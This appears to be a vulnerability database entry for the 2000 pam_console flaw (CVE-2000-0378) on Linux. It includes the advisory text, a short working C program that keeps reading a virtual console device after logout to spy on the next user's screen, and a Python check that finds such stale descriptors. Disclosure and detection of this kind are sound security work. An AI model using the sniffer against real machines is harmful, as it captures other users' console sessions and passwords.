pam_console Vulnerability in Multiple Linux Vendors' Distributions

Vulnerability ID: 1105813    Type: Access validation error
Published: 2000-05-03    Updated: 2005-05-02
CVE: CVE-2000-0378    CNNVD ID: CNNVD-200005-020
Platform: Linux    CVSS score: 7.2
|Source
https://www.exploit-db.com/exploits/19900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-020
|Details
The pam_console PAM module on Linux systems changes the owner of several device files to whichever user logs in at the console. After that user logs out, however, any file descriptors they still hold on those devices remain open, so a user who has logged out can keep reading a device and sniff the console session of the next user who logs in.
|Exploit
/*
source: http://www.securityfocus.com/bid/1176/info

A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to hand ownership of certain devices to users logging in at the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon login, and chown them back to root upon logout. However, as certain devices do not have a 'hangup' mechanism like a tty device does, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow a malicious user to sniff other users' console sessions, and potentially obtain the root password if the root user logs in or a user su's to root. They could also surreptitiously execute commands as the user on the console.
*/

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Usage: ./a.out /dev/vcsN -- repeatedly dumps the 80x24 text of a virtual
   console whose descriptor was opened before pam_console chowned it back. */
int main(int argc, char *argv[]) {
  char buf[80*24];                 /* one 80x24 screen of console text */
  ssize_t n;
  int f;
  if (argc < 2) {
    fprintf(stderr, "usage: %s <vcs device>\n", argv[0]);
    return 1;
  }
  f = open(argv[1], O_RDWR);
  if (f < 0) {
    perror("open");
    return 1;
  }
  while (1) {
    lseek(f, 0, SEEK_SET);         /* rewind to the top of the screen */
    n = read(f, buf, sizeof(buf));
    write(1, "\033[2J\033[H", 7); /* clear terminal, vt100/linux/ansi */
    if (n > 0)
      write(1, buf, n);            /* only write what was actually read */
    usleep(10000);
  }
}
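A defender-side check for the condition described above (an added example, not code from the advisory or from pam_console): it flags non-root processes still holding a console device whose current owner is a different user, first on constructed sample descriptor data and then, when run on a Linux host, on the live /proc table. The device-name list and the sample pids/uids are assumptions.

```python
import os
import re

# Console device classes pam_console commonly manages (assumed list for this
# check); /dev/vcs* are the virtual console memory devices the PoC above reads.
CONSOLE_DEV = re.compile(r"^/dev/(vcsa?\d*|tty\d+|dsp|audio|mixer|cdrom)$")

# Constructed sample: uid 1001 logged out but kept /dev/vcs1 open; the device
# now belongs to uid 1002, the user currently at the console.
SAMPLE_FDS = [(4242, 1001, "/dev/vcs1"),   # stale handle from the previous login
              (4300, 1002, "/dev/vcs1"),   # current console user, legitimate
              (1, 0, "/dev/tty1")]          # root-owned process, ignored
SAMPLE_OWNERS = {"/dev/vcs1": 1002, "/dev/tty1": 1002}

def stale_handles(open_fds, dev_owner):
    """Return (pid, uid, device) for non-root processes holding a console
    device that pam_console has since handed to a different user.

    open_fds  -- iterable of (pid, process uid, path the descriptor points at)
    dev_owner -- mapping of device path to its current owner uid
    """
    hits = []
    for pid, uid, path in open_fds:
        if uid == 0 or not CONSOLE_DEV.match(path):
            continue                        # root, or not a console device
        owner = dev_owner.get(path)
        if owner is not None and owner != uid:
            hits.append((pid, uid, path))   # descriptor outlived the chown
    return hits

def scan_proc():
    """Collect console-device descriptors from /proc/<pid>/fd on this host."""
    open_fds, dev_owner = [], {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            uid = os.stat(f"/proc/{pid}").st_uid
            for fd in os.listdir(f"/proc/{pid}/fd"):
                target = os.readlink(f"/proc/{pid}/fd/{fd}")
                if CONSOLE_DEV.match(target):
                    open_fds.append((int(pid), uid, target))
                    dev_owner.setdefault(target, os.stat(target).st_uid)
        except OSError:
            continue                        # process exited or fd dir unreadable
    return stale_handles(open_fds, dev_owner)

if __name__ == "__main__":
    print(stale_handles(SAMPLE_FDS, SAMPLE_OWNERS))  # -> [(4242, 1001, '/dev/vcs1')]
    for pid, uid, dev in scan_proc():
        print(f"pid {pid} (uid {uid}) still holds {dev}")
```

Running scan_proc() as root is needed to read other users' /proc/<pid>/fd directories; a hit means a descriptor that survived the logout chown and should be closed or the process terminated.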
|References

Source: BID
Name: 1176
Link: http://www.securityfocus.com/bid/1176
Source: BUGTRAQ
Name: 20000502 pam_console bug
Link: http://archives.neohapsis.com/archives/bugtraq/2000-05/0023.html